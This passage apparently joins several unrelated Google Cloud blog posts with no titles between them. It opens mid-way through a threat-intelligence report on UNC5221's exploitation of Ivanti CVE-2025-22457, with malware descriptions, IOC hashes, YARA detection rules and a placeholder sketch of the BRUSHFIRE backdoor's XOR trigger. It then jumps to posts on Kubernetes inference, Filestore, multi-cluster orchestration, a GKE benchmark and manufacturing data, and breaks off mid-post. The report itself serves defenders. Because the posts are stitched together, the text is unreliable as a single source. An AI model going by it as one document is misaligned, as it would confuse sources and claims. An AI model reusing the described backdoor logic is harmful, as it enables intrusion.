TRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified /home/bin/web process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process.
BRUSHFIRE
BRUSHFIRE is a passive backdoor written in bare C that acts as an SSL_read hook. It first executes the original SSL_read function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call SSL_write to send the value back.
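To make the mechanics concrete, here is an illustrative sketch of the decryption step described above. It is not recovered malware logic: the magic prefix and XOR key are hypothetical placeholders (the real values are not published here), and a repeating-key XOR is simply the most direct reading of “XOR decrypt.”

# brushfire_decode_sketch.py - illustrative only; MAGIC and KEY are made up.
MAGIC = b"<magic-prefix>"  # hypothetical actor-chosen marker string
KEY = b"<xor-key>"         # hypothetical static key

def try_extract_shellcode(ssl_read_data: bytes):
    if not ssl_read_data.startswith(MAGIC):
        return None  # non-matching traffic is passed through untouched
    body = ssl_read_data[len(MAGIC):]
    # repeating-key XOR over the remainder of the buffer
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(body))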
SPAWNSLOTH
As detailed in our previous blog post, SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the dslogserver process to disable both local logging and remote syslog forwarding.
SPAWNSNARE
SPAWNSNARE is a utility written in C that targets Linux. It can be used to extract the uncompressed Linux kernel image (vmlinux) into a file and encrypt it using AES, without the need for any command-line tools.
SPAWNWAVE
SPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the SPAWN* malware ecosystem. SPAWNWAVE overlaps with the publicly reported SPAWNCHIMERA and RESURGE malware families.
Attribution
Google Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation of CVE-2023-46805 and CVE-2024-21887.
Furthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances.
GTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations.
Conclusion
This latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure.
Recommendations
Mandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally, organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance.
Acknowledgements
We would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance of analysts across Google Threat Intelligence Group and Mandiant’s FLARE. We would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support.
Indicators of Compromise
To assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.
Code Family | MD5 | Filename | Description
TRAILBLAZE | 4628a501088c31f53b5c9ddf6788e835 | /tmp/.i | In-memory dropper
BRUSHFIRE | e5192258c27e712c7acf80303e68980b | /tmp/.r | Passive backdoor
SPAWNSNARE | 6e01ef1367ea81994578526b3bd331d6 | /bin/dsmain | Kernel extractor & encryptor
SPAWNWAVE | ce2b6a554ae46b5eb7d79ca5e7f440da | /lib/libdsupgrade.so | Implant utility
SPAWNSLOTH | 10659b392e7f5b30b375b94cae4fdca0 | /tmp/.liblogblock.so | Log tampering utility
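For convenience, here is the same table as a Python structure, with an MD5 helper for sweeping files pulled from an appliance (paths and script name are illustrative):

# spawn_iocs.py - the indicators above, ready for a hunting script.
import hashlib

IOCS = {
    "4628a501088c31f53b5c9ddf6788e835": ("TRAILBLAZE", "/tmp/.i"),
    "e5192258c27e712c7acf80303e68980b": ("BRUSHFIRE", "/tmp/.r"),
    "6e01ef1367ea81994578526b3bd331d6": ("SPAWNSNARE", "/bin/dsmain"),
    "ce2b6a554ae46b5eb7d79ca5e7f440da": ("SPAWNWAVE", "/lib/libdsupgrade.so"),
    "10659b392e7f5b30b375b94cae4fdca0": ("SPAWNSLOTH", "/tmp/.liblogblock.so"),
}

def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def check(path: str) -> None:
    hit = IOCS.get(md5_of(path))
    if hit:
        print(f"MATCH {path}: {hit[0]} (observed at {hit[1]})")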
YARA Rules
rule M_APT_Installer_SPAWNANT_1
{
    meta:
        author = "Mandiant"
        description = "Detects SPAWNANT. SPAWNANT is an installer targeting Ivanti devices. Its purpose is to persistently install other malware from the SPAWN family (SPAWNSNAIL, SPAWNMOLE) as well as drop additional webshells on the box."
    strings:
        $s1 = "dspkginstall" ascii fullword
        $s2 = "vsnprintf" ascii fullword
        $s3 = "bom_files" ascii fullword
        $s4 = "do-install" ascii
        $s5 = "ld.so.preload" ascii
        $s6 = "LD_PRELOAD" ascii
        $s7 = "scanner.py" ascii
    condition:
        uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_Utility_SPAWNSNARE_1 {
    meta:
        author = "Mandiant"
        description = "SPAWNSNARE is a utility written in C that targets Linux systems by extracting the uncompressed Linux kernel image into a file and encrypting it with AES."
    strings:
        $s1 = "\x00extract_vmlinux\x00"
        $s2 = "\x00encrypt_file\x00"
        $s3 = "\x00decrypt_file\x00"
        $s4 = "\x00lbb_main\x00"
        $s5 = "\x00busybox\x00"
        $s6 = "\x00/etc/busybox.conf\x00"
    condition:
        uint32(0) == 0x464c457f and all of them
}
rule M_APT_Utility_SPAWNSLOTH_2
{
    meta:
        author = "Mandiant"
        description = "Hunting rule to identify strings found in SPAWNSLOTH"
    strings:
        $dslog = "dslogserver" ascii fullword
        $hook1 = "g_do_syslog_servers_exist" ascii fullword
        $hook2 = "ZN5DSLog4File3addEPKci" ascii fullword
        $hook3 = "funchook" ascii fullword
    condition:
        uint32(0) == 0x464c457f and all of them
}
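One way to run these rules in bulk is the yara-python package (pip install yara-python); below is a minimal sweep sketch, with the rules saved to a local file and the scan root as assumptions:

# scan_with_yara.py - compile the rules above and sweep a directory tree.
import os
import yara

rules = yara.compile(filepath="spawn_rules.yar")  # file containing the rules above

for root, _dirs, files in os.walk("/mnt/ics_image"):  # assumption: mounted image
    for name in files:
        path = os.path.join(root, name)
        try:
            for match in rules.match(path):
                print(f"{match.rule}: {path}")
        except yara.Error:
            pass  # unreadable or special files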
Over the past ten years, Kubernetes has become the leading platform for deploying cloud-native applications and microservices, backed by an extensive community and boasting a comprehensive feature set for managing distributed systems. Today, we are excited to share that Kubernetes is now unlocking new possibilities for generative AI inference.
In partnership with Red Hat and ByteDance, we are introducing new capabilities that optimize load balancing, scaling, and model server performance on Kubernetes clusters running large language model (LLM) inference. These capabilities build on the success of LeaderWorkerSet (LWS), which enables multi-host inference for state-of-the-art models (including ones with 671B parameters), and push the envelope on what’s possible for gen AI inference on Kubernetes.
First, the new Gateway API Inference Extension now supports LLM-aware routing, rather than traditional round robin. This makes it more cost-effective to operationalize popular Parameter-Efficient Fine-Tuning (PEFT) techniques such as Low-Rank Adaptation (LoRA) at scale, by using a base model and dynamically loading fine-tuned models (‘adapters’) based on user need. To support PEFT natively, we also introduced new APIs, namely InferencePool and InferenceModel.
Second, a new inference performance project provides a benchmarking standard for detailed model performance insights on accelerators and HPA scaling metrics and thresholds. With the growth of gen AI inference on Kubernetes, it’s important to be able to measure the performance of serving workloads alongside the performance of model servers, accelerators, and Kubernetes orchestration.
Third, Dynamic Resource Allocation, developed with Intel and others, simplifies and automates how Kubernetes allocates and schedules GPUs, TPUs, and other devices to pods and workloads. When used along with the vLLM inference and serving engine, the community benefits from scheduling efficiency and portability across accelerators.
“Large-scale inference with scalability and flexibility remains a challenge on Kubernetes. We are excited to collaborate with Google and the community on the Gateway API Inference Extension project to extract common infrastructure layers, creating a more unified and efficient routing system for AI serving — enhancing both AIBrix and the broader AI ecosystem.” – Jiaxin Shan, Staff Engineer at Bytedance, and Founder at AIBrix
“We’ve been collaborating with Google on various initiatives in the Kubernetes Serving working group, including a shared benchmarking tool for gen AI inference workloads. Working with Google, we hope to contribute to a common standard for developers to compare single-node inference performance and scale out to the multi-node architectures that Kubernetes brings to the table.” – Yuan Tang, Senior Principal Software Engineer, Red Hat
“We are partnering with Google to improve vLLM for operationalizing deployments of open-source LLMs for enterprise, including capabilities like LoRA support and Prometheus metrics that enable customers to benefit across the full stack, right from vLLM to Kubernetes primitives such as Gateway. This deep partnership across the stack ensures customers get production-ready architectures to deploy at scale.” – Robert Shaw, vLLM Core Committer and Senior Director of Engineering, Neural Magic (acquired by Red Hat)
Together, these projects allow customers to qualify and benchmark accelerators with the inference performance project, operationalize scale-out architectures with LLM-aware routing with the Gateway API Inference extension, and provide an environment with scheduling and fungibility benefits across a wide range of accelerators with DRA and vLLM. To try out these new capabilities for running gen AI inference on Kubernetes, visit Gateway API Inference Extension, the inference performance project or Dynamic Resource Allocation. Also, be sure to visit us at KubeCon in London this week, where we’ll be participating in the keynote as well as many other sessions. Stop by Booth S100 to say hi!
We are excited to announce Filestore Instance Replication on Google Cloud, which helps customers meet their business continuity goals and regulatory requirements. The feature offers an efficient recovery point objective (RPO) that can reach 30 minutes for data change rates of 100 MB/sec.
Our customers have been telling us they need to meet regulatory and business requirements for business continuity, and have been looking for file storage that provides that capability. Instance Replication lets customers replicate Filestore instances to a secondary location – a remote region, or a separate zone within a region. The feature continuously replicates incremental data changes on the active instance to the standby instance in the secondary location.
The process of replicating an instance is simple:
A new designated standby instance is created in the remote location
The feature performs an initial sync moving all data from the active source instance to the standby replica instance
Upon completion, incremental data is continuously replicated
An RPO metric lets customers monitor the replication process
In the event of an outage in the source region, customers can break the replication
Customers can simply connect their application to the replica instance and continue their business – with minimal data loss.
It can take as little as 2 minutes to set up, monitoring is simple, and breaking the replication is achieved using a single command.
The feature is available on Filestore Regional, Zonal, Enterprise and High Scale tiers. Instance Replication functionality is provided at no charge and customers are billed for the components used in the service, which are the Filestore instances and cross-regional networking. Give it a try here.
Today, we’re excited to announce the public preview of Multi-Cluster Orchestrator, a new service designed to streamline and simplify the management of workloads across Kubernetes clusters. Multi-Cluster Orchestrator lets platform and application teams optimize resource utilization, enhance application resilience, and accelerate innovation in complex, multi-cluster environments.
As organizations increasingly adopt Kubernetes to deploy and manage their applications, the need for efficient multi-cluster management becomes critical. Challenges such as resource scarcity, ensuring high availability, and managing deployments across diverse environments create significant operational overhead. Multi-Cluster Orchestrator addresses these challenges by providing a centralized orchestration layer that abstracts away the complexities of the underlying Kubernetes infrastructure, matching workloads with available capacity across regions.
Key benefits of Multi-Cluster Orchestrator
Simplified multi-cluster workload management: Multi-Cluster Orchestrator lets you manage workloads across multiple Kubernetes clusters as a single unit. Platform teams can focus on defining guardrails and policies, while application teams can concentrate on their core workloads.
Intelligent resource optimization: Multi-Cluster Orchestrator tackles the challenge of resource scarcity by intelligently placing workloads in clusters with available capacity, such as those with GPUs. This helps ensure optimal resource utilization and helps organizations avoid stockouts without incurring unnecessary costs.
Enhanced application resilience: Multi-Cluster Orchestrator facilitates regional failure tolerance for critical applications by enabling deployments across multiple clusters.
Tight integration with existing tools: Multi-Cluster Orchestrator is designed to complement existing workflows and tools. For example, the Argo CD plugin lets teams integrate Multi-Cluster Orchestrator with their GitOps practices, leveraging existing continuous delivery pipelines.
Who should use Multi-Cluster Orchestrator?
Multi-Cluster Orchestrator is designed for:
Platform engineering teams with a GitOps focus: GitOps-focused teams building and managing general serving applications across multiple GKE regions using tools like Argo CD can leverage Multi-Cluster Orchestrator to simplify multi-cluster deployments. In addition, teams with custom continuous delivery (CD) solutions can use it to provide cluster target recommendations, enhancing their existing deployment workflows.
AI/ML inferencing platform teams: Teams looking for dynamic resource allocation to minimize stockout risks and optimize costs for their AI/ML inferencing applications can benefit from Multi-Cluster Orchestrator’s intelligent workload placement.
Early adopters of Multi-Cluster Orchestrator are already seeing value from the tool. One of them, Abridge, a company dedicated to delivering sophisticated AI solutions for clinical conversations in healthcare, recognizes its promise:
“Multi-Cluster Orchestrator offers an opportunity to further scale our inference workloads across multiple GKE clusters. Its ability to intelligently manage resource allocation could lead to improved availability and cost efficiency. We’re evaluating how automating workload placement and scaling with this technology can streamline our operational framework and advance our AI-driven processes.” – Trey Caliva, Staff Platform Engineer, Abridge
Get started with Multi-Cluster Orchestrator
At Google Cloud, we’re committed to helping organizations build and manage their applications at scale. Multi-Cluster Orchestrator represents a significant step towards simplifying multi-cluster Kubernetes management and enabling the next generation of cloud-native applications.
Multi-Cluster Orchestrator is now available in public preview. To learn more and get started, visit the documentation.
At Google Cloud, we’re continuously working on Google Kubernetes Engine (GKE) scalability so it can run increasingly demanding workloads. Recently, we announced that GKE can support a massive 65,000-node cluster, up from 15,000 nodes. This signals a new era of possibilities, especially for AI workloads and their ever-increasing demand for large-scale infrastructure.
This groundbreaking achievement was built upon Google’s prior experience training large language models (LLMs) on a 50,000+ chip TPU cluster. By leveraging technologies like TPU multislice training, GKE can now handle a massive number of virtual machines while addressing challenges in resource management, scheduling, and inter-node communication.
In addition to demonstrating GKE’s capability to handle extreme scale, this breakthrough also offers valuable insights for optimizing large-scale AI training on Google Cloud.
Running large AI workloads on Kubernetes means running both resource-intensive training and dynamic inference tasks. You need a huge amount of computational resources to train a massive, interconnected model. Simultaneously, inference workloads need to scale efficiently in response to changing customer demand. Mixing training and inference — two workloads with different characteristics — on the same cluster presents a number of complexities that need to be addressed.
In this blog post, we explore a benchmark that simulates these massive AI workloads on a 65,000-node GKE cluster. As we look to develop and deploy even larger LLMs on GKE, we regularly run this benchmark against our infrastructure as a continuous integration (CI) test. We look at its results in detail, as well as the challenges we faced and ways to mitigate them.
Benchmark design
As with any benchmark, the devil is in the details. Here are some of the requirements we set for our test environment:
CPU-only: For the purpose of benchmarking the Kubernetes control plane, we opted to use CPU-only machines, which is a much more cost-effective way to measure the performance of the cluster on a large scale compared to GPUs or TPUs.
Cluster size: At the start of the benchmark we created a 65,000-node cluster. We assumed the cluster would not need to autoscale on the node level, but that workloads dynamically change in size, and can be stopped and restarted.
Real-life scenarios: We wanted to show the GKE cluster’s ability to accommodate scaling, ease of use, and workload fungibility between training and inference based on real-life scenarios and use cases. As such, the benchmark focused on scenario-related metrics like scheduler throughput. Specifically, we prioritized a usage pattern that combines a very large training job (50K+ nodes) with a scalable inference workload.
Cluster setup
We created the 65,000-node cluster using a publicly available Terraform configuration, with variables to set the cluster name and project. To achieve this scale, we followed best practices from the GKE documentation on planning large GKE clusters.
kube-scheduler
We also used a customized kube-scheduler configuration for our simulated workload. At 500 bindings per second, we were able to schedule a large-scale workload while making highly efficient use of cluster resources.
Simulating the AI workload
In our experiment, we used a StatefulSet with Pods running sleep containers (minimal containers that simply sleep for the duration of the Pod’s lifetime) to simulate the behavior of a large-scale AI workload. This allowed us to closely examine resource allocation and scheduling within the Kubernetes cluster without having to run distributed AI workloads on CPU-based VMs. When designing the workload, we made the following design decisions (a minimal sketch of the resulting StatefulSet follows the list):
Choosing the right Kubernetes workload: For our test setup we focused on the StatefulSet API, which is commonly used in generative AI workloads. We used a headless service for the StatefulSet to mimic communication between Pods within the distributed training workload.
Ensuring a single-user-workload Pod per node (in addition to DaemonSets): We configured the StatefulSet to ensure that only one Pod was scheduled per Node, which reflects how most users currently run their AI workloads. We did this by specifying the hostPort within the StatefulSet’s Pod spec template.
Simulating “all-or-nothing” preemption: To accurately reflect the dynamics of AI workloads, especially the “all-or-nothing” nature of many distributed training jobs, we implemented a manual scale-down mechanism. This means we trigger scale-down of the training workload right after the inference workload scales up.
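Here is a minimal sketch of such a workload, built with the official kubernetes Python client: a headless Service plus a StatefulSet of sleep Pods, with hostPort forcing at most one simulation Pod per Node. This is not the exact benchmark configuration; names, namespace, image, port, and replica count are illustrative assumptions.

# sleep_statefulset.py - simulate a large training job with sleep Pods.
from kubernetes import client, config

config.load_kube_config()
core, apps = client.CoreV1Api(), client.AppsV1Api()
labels = {"app": "training-sim"}

headless = client.V1Service(
    metadata=client.V1ObjectMeta(name="training-sim"),
    spec=client.V1ServiceSpec(cluster_ip="None", selector=labels),  # headless
)

sts = client.V1StatefulSet(
    metadata=client.V1ObjectMeta(name="training-sim"),
    spec=client.V1StatefulSetSpec(
        service_name="training-sim",
        replicas=65000,  # sized to the benchmark cluster
        pod_management_policy="Parallel",  # assumption: create Pods in parallel
        selector=client.V1LabelSelector(match_labels=labels),
        template=client.V1PodTemplateSpec(
            metadata=client.V1ObjectMeta(labels=labels),
            spec=client.V1PodSpec(
                automount_service_account_token=False,  # startup optimization (see final remarks)
                containers=[client.V1Container(
                    name="sleep",
                    image="busybox:1.36",
                    command=["sleep", "864000"],  # idle for the Pod's lifetime
                    # hostPort limits scheduling to one such Pod per Node
                    ports=[client.V1ContainerPort(container_port=5000, host_port=5000)],
                )],
            ),
        ),
    ),
)

core.create_namespaced_service("default", headless)
apps.create_namespaced_stateful_set("default", sts)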
By employing these techniques, we were able to create a realistic simulation of an AI workload within our Kubernetes cluster. This environment enabled us to thoroughly test the scalability, performance, and resilience of the cluster under a variety of conditions.
Tooling
To develop our benchmark, we used several tools, including ClusterLoader2 to build the performance test, Prow to run the test as part of our continuous integration pipeline, Prometheus to collect metrics, and Grafana to visualize them.
Performance test
Our simulated scenario mimics a mix of AI workloads: AI training and AI inference. There are five phases, with each simulating a different real-life scenario that occurs over the course of the LLM development and deployment lifecycle.
Phase #1: Single workload — creating a large training workload (StatefulSet) from scratch
In the first phase, we run a large training workload, represented by a StatefulSet with 65,000 Pods. This represents a large-scale distributed training job that spans 65,000 VMs. Each Pod maps to a single Node, utilizing all of the resources accessible within the cluster.
The phase is complete when the training job terminates, ending in an empty cluster.
Phase #2: Mixed workload — training and inference workloads (StatefulSets)
In the second phase, we run a mixed workload environment within a single cluster, highlighting the capability of running different types of workloads and sharing resources. This involves concurrently running one training workload with 50,000 Pods and another inference workload with 15,000 Pods. Each Pod is assigned to a single Node, helping to ensure full utilization of the cluster’s resources. Notably, the inference workload is given higher priority than the training workload.
Phase #3: Scale up of inference workload (StatefulSet), training workload disruption
In Phase #3, we scale up the inference workload, which in real life is typically due to increased traffic or demand on the services. Since the inference workload has a higher priority, it interrupts the training workload. Once the inference workload is scheduled and running, we recreate the training workload. Given that the training workload has a lower priority, it stays in a pending state as long as the inference workload is running at full capacity.
Phase #4: Scale down inference workload, training workload recovery
Here, we simulate a decrease in traffic on the inference workload, triggering the scale-down of the inference workload from 65,000 Pods back to 15,000 Pods. This enables the pending training workload to be scheduled and run again.
Phase #5: Training workload finishes
Finally, we come to the end of the training, indicated by the termination and deletion of the training workload, freeing up resources in the cluster.
Note: In our tests we used StatefulSets, as this is what large AI model producers use. However, with the latest advancements, Kubernetes Job and JobSet are the recommended APIs for running ML training workloads. Those abstractions were also tested at scale, but in dedicated tests.
Metrics
For our test we used ClusterLoader2’s built-in measurements to collect relevant metrics, metrics from Prow logs, and internal GKE metrics.
Key metrics measured by ClusterLoader2 include:
Pod state transition duration: How long it takes a workload’s Pods to change state (e.g., to reach the running state or to be deleted); this also covers monitoring a workload’s in-progress status (i.e., how many Pods are created, running, pending schedule, or terminated).
Pod startup latency: The time it takes for a Pod to go from being created to being marked as running.
Scheduling throughput: The rate at which Pods are successfully assigned to Nodes (a toy throughput calculation appears after the measurement lists).
In addition to the ClusterLoader2 measurements, we also measured:
Cluster creation/deletion time
Various cluster metrics that are exported to Prometheus (e.g., API server latency metrics)
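As a toy illustration of the throughput metric (not ClusterLoader2's actual implementation), peak and average scheduling throughput can be derived from the per-Pod bind timestamps observed on the watch stream:

# throughput_sketch.py - derive scheduling throughput from bind timestamps.
from collections import Counter

def scheduling_throughput(bind_times: list[float]) -> tuple[float, float]:
    # bind_times: epoch seconds at which each Pod was bound to a Node
    if not bind_times:
        return 0.0, 0.0
    per_second = Counter(int(t) for t in bind_times)
    duration = max(bind_times) - min(bind_times) or 1.0
    return float(max(per_second.values())), len(bind_times) / duration

peak, avg = scheduling_throughput([0.1, 0.4, 0.9, 1.2, 1.3, 2.0])
print(f"peak={peak}/s average={avg:.1f}/s")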
Benchmark results
The results we present in this document are based on a simulation that runs at a specific point in time. To provide context, here’s a timeline with an explanation of when each phase took place.
Observing workloads
Based on data from ClusterLoader2, we generated the chart below, which summarizes all the phases and how the training and inference workload interact with one another throughout the performance test.
In phase #1, we see a smooth workload creation process in which Pods are created quickly and scheduled with only minor delay. The process takes ~2.5 minutes to create, schedule, and run 65,000 Pods on an empty cluster (with caveats — see the previous section).
In phase #2, we observe a similarly smooth creation process for the training workload, with 50,000 Pods created in under 2 minutes from an empty cluster. Moreover, we observe the creation of 15,000 Pods for the inference workload in under a minute on a nearly full cluster, demonstrating fast scheduling even when the cluster is not empty.
During phase #3, we observe the scale up of the inference workload to 65,000 Pods and the disruption and termination of the training workload. Scheduling inference Pods suffers some delay compared to phase 2 due to waiting for the training Pods to be evicted from the Nodes. Nonetheless, the entire startup process for the inference workload takes less than four minutes in total.
After terminating and recreating the training workload, we observe its Pods in a pending state (seen between 7:20 and 7:25 in the graph, where the dotted blue line, representing created training Pods, sits at 50,000 and the dotted orange line, representing running training Pods, sits at 0) while the higher-priority inference workload occupies all 65,000 Nodes.
Cluster performance
We use the metrics collected by Prometheus for information about control-plane performance across the experiment’s timeline. For example, you can see the P99 API call latency across various resources, where all API calls, including write calls, are under 400 ms latency — well within the 1s threshold; this satisfies the OSS SLO for resource-scoped API calls.
While API call latency provides a general indication of cluster health, particularly for the API server (as demonstrated by the consistently low response times shown previously), Pod creation and binding rates provide a more holistic perspective on overall cluster performance, validating the performance of the various components involved in the Pod startup process. Our benchmark reveals that a standard GKE cluster (without advanced scheduling features) can achieve a Pod creation rate of 500 Pods per second (see graph below).
Metrics results
Below is a table that summarizes the metrics collected through the different phases of the performance test. Please note that these metrics are the result of experiments done at the time and shouldn’t be taken as SLOs or guarantees of performance in all scenarios; performance may vary across GKE versions.
Final remarks
In this experiment, we showcase the GKE cluster’s ability to manage substantial and dynamic workloads. While you can find specific metrics in the table above, here are a few general observations about running large AI workloads on GKE, and the potential implications for your own workloads.
Scaling efficiency: Our experiment involved rapid scaling of massive workloads, both up and down. However, even for such large workloads, scaling was quite efficient. Creating a 65,000-Pod StatefulSet and having all Pods running on an empty cluster took only 2 minutes and 24 seconds! Scaling up and down during phases 3 and 4 was also quite fast, with the inference workload taking ~4 minutes to scale up from 15,000 to 65,000 Pods (including waiting for the training workload to be preempted), and ~3 minutes to scale down to 15,000 Pods again.
Image pulling and Pod startup latency: During phase 1, we experienced some degradation in Pod startup latency, with P100 around 20.4s, compared to 5.6s and 5.0s in later phases. This was due to image pull time from Artifact Registry; it wasn’t relevant in later phases, as Pods used the images already cached on the Nodes. Moreover, in this benchmark we used a small sleep container to run on the Pods of the StatefulSet, a workload that we knew wouldn’t cause additional delays that might impact performance. In a real-life scenario with larger images, expect slower initial Pod startup times, since the size of a typical image for an ML workflow is likely on the order of gigabytes.
Workload diversity and its effect on scheduling throughput: The introduction of mixed workloads (training and inference) in Phase #2, and the later scaling and preemption in Phase #3, adds a layer of complexity. This brought the median/average scheduling throughput down to 222/208 Pods/s, from 496/417 Pods/s, respectively.
Performance bottlenecks: Examining detailed metrics can help identify potential bottlenecks. For instance, high Pod startup latency could indicate issues with resource provisioning or image pulling. We observed such issues and were able to bring the initial StatefulSet creation time in phase 1 down from 12 minutes to 2 minutes 30 seconds by tweaking the setup a bit. This included using Artifact Registry instead of Container Registry, as well as disabling the kubelet’s auto-mounting of service account credentials into the StatefulSet’s Pods (using automountServiceAccountToken: false).
Overall, the experiment’s focus on large-scale workloads makes our results particularly relevant for organizations deploying machine learning or data-processing applications on Kubernetes. The experiments, focused on Kubernetes Control Plane (KCP) performance, are part of our regular CI tests. We are continuously expanding these tests to validate the growing demands of running AI workloads on these massive clusters. Stay tuned for future blog posts exploring more sophisticated scenarios on a 65,000-node cluster, including the use of accelerators and the evaluation of diverse AI workloads on GKE.
In today’s dynamic business landscape, manufacturers are facing unprecedented pressure. The relentless pace of e-commerce, combined with the constant threat of supply chain disruptions, creates a perfect storm. To overcome this complexity, leading manufacturers are leveraging the power of AI and integrated data solutions to not only survive, but thrive.
This week, at Hannover Messe, Google Cloud is announcing the latest release of its signature solution, Manufacturing Data Engine (MDE), to help manufacturers unlock the full potential of their operational data and drive AI transformation on and off the factory floor, faster. We believe it will play a critical role in helping forward-thinking leaders address five critical trends that are shaping the future of manufacturing.
1. B2B buyers demand digital-first experiences
Business buyers are increasingly adopting consumer-like behaviors, forgoing traditional, linear sales cycles. According to Gartner, 80% of B2B sales will be generated digitally in 2025. This shift demands a digital-first approach that extends beyond online storefronts to create seamless, personalized experiences across the entire customer journey.
For leading manufacturers, AI-powered user experiences can help address this shift in behavior. By leveraging AI to personalize product recommendations, streamline online ordering, and provide real-time customer support, manufacturers can meet the demands of digitally-savvy buyers.
2. Resilience is non-negotiable
The pandemic exposed the fragility of global supply chains, and disruptions continue to be commonplace. According to Accenture, supply chain disruptions cause businesses to miss out on $1.6 trillion in revenue growth opportunities each year, on average. Increasing resilience and addressing disruption isn’t just a logistical challenge; it requires a proactive approach. Manufacturers need to enhance visibility, improve forecasting, and leverage technology to identify and mitigate potential risks.
Multimodal AI can help improve supply chain management. By analyzing data from various sources like sensor data, visual inspections, and logistics tracking, AI can provide a holistic view of the supply chain, enabling proactive responses to disruptions.
3. Bridging a digital skills gap
The manufacturing industry is facing a severe shortage of skilled workers, exacerbated by the rapid pace of technological advancements. Deloitte and The Manufacturing Institute found that there could be as many as 3.8 million net new employees needed in manufacturing between 2024 and 2033, and that around half of these jobs (1.9 million) could remain unfilled if the talent void is not solved. This talent gap poses a significant challenge to productivity, innovation, and long-term growth. Addressing the talent gap in manufacturing requires a multi-pronged approach. Manufacturers must invest in upskilling and reskilling their existing workforce, while also attracting and retaining top talent through competitive benefits and engaging work environments.
To empower existing workers and accelerate training, multimodal assistive search tools can provide instant access to relevant information through various formats like text, audio, and video. These tools enable users to verbally query for information, receive spoken answers or summaries of manuals, listen to step-by-step instructions, and even facilitate the creation of video-based training materials – rapidly enabling learning.
4. Sustainability is a business mandate (Enhanced by AI Agents)
Sustainability is now deeply intertwined with business success, with 88% of manufacturers recognizing the critical role of technology in going green. Consumers are increasingly demanding sustainable products and practices, and regulators are imposing stricter environmental standards. Manufacturers must embrace sustainable practices across their entire value chain, from sourcing raw materials to minimizing waste and reducing their carbon footprint.
To manage complex sustainability reporting, AI agents can automate data collection and analysis. To help with compliance, agents can verify the materials and ingredients used against sources, track proper disclosures, and confirm adherence to mandated disclaimers.
5. Unlocking holistic insights
Many manufacturing organizations operate with siloed data residing in disparate departments and systems. The data is also incredibly diverse, often including Operational Technology (OT) data from the shop floor, Information Technology (IT) data from enterprise systems, and Engineering Technology (ET) data from design and simulation tools. This fragmentation, coupled with the differences in data formats, structures, and real-time requirements across these domains, can hinder manufacturers’ ability to gain a holistic view of their operations. This leads to missed opportunities for optimization and inefficient decision-making. Breaking down these silos and establishing interoperability across OT, IT, and ET data is critical for unlocking the full potential of AI and driving truly informed business decisions.
As manufacturers integrate more data, the risk increases and AI-powered security becomes essential. AI can detect anomalies, facilitate threat intelligence including prevention, detection, monitoring and remediation – and ensure data integrity across interconnected systems, safeguarding sensitive information.
How do MDE and Cortex Framework help manufacturers address these five challenges?
Manufacturing Data Engine provides a unified data and AI layer that facilitates the analysis of multimodal data for better supply chain visibility, supports assistive search for bridging talent gaps, and enables AI agents to optimize sustainability initiatives. Furthermore, MDE helps contextualize various types of data, including OT, IT, and ET, allowing for richer insights and more effective AI applications. Critically, MDE aids in establishing a digital thread by connecting data back to its source, ensuring traceability and a holistic understanding of the product lifecycle. Moreover, Cortex Framework allows for the seamless integration of enterprise data with manufacturing data, enabling use cases like forecasting financial impact with machine data and optimizing production schedules based on demand signals.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of the new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine.
Breaking down the data silos between IT (business data) and OT (industrial data) is critical for manufacturers seeking to harness the power of AI for competitive advantage. This week, at Hannover Messe, Google Cloud is excited to announce the latest release of its signature solution, Manufacturing Data Engine, to help manufacturers unlock the full potential of their operational data and drive AI transformation on and off the factory floor, faster.
In 2024, we delivered a number of enhancements to MDE that strengthened the integration between OT and IT data, along with initial technical foundations for MDE to integrate with Cortex Framework. At the same time, adoption of Cortex Framework, which helps customers accelerate business insights from their enterprise IT data, has grown beyond traditional enterprise IT data sources such as ERP, CRM, and ESG to marketing and social media data, and more.
